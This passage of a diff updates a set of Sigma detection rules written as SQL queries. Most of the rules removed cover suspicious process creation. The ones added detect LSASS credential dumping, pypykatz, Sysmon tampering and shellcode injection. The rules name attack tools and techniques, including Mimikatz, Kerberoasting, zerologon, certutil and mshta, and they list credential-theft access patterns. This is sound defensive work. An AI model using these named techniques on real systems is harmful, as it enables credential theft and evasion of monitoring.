'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Data Copied To Clipboard Via Clip.EXE", - "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "author": "frack113", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_clip_execution.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "status": "experimental", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.t1574" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1059.003" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "status": "experimental", - "description": "Detects 